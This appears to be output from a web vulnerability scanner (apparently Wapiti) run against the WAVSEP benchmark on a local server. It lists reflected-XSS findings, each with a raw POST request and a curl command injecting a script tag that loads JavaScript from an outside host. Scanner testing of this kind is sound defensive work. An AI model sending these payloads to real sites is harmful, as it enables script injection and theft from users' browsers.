POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiqrqurotpz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiqrqurotpz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo9h5jmp06z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo9h5jmp06z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsksyxpjmjz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsksyxpjmjz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyz2fwqfuaz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyz2fwqfuaz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjmj69f6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjmj69f6z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3v14uuscrz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3v14uuscrz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1ebm5klhzz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1ebm5klhzz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgpljk9saxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgpljk9saxz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw66laro8jnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw66laro8jnz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw266v6qgb4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw266v6qgb4z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt4twjyejlz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt4twjyejlz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjeb1r43qaz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjeb1r43qaz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxo2i6xe63z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxo2i6xe63z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjynsj5hahz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjynsj5hahz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9yteu1jllz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9yteu1jllz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3aifg34fxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3aifg34fxz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwmoiwayn6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwmoiwayn6z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtv78t0v0cz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtv78t0v0cz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpswn84yyoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpswn84yyoz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr73xpf9p9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr73xpf9p9z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpynjnhj6fz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpynjnhj6fz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0q50jsh2wz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0q50jsh2wz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0nxq5wlghz.js%3E%3C%2Fscript%3E
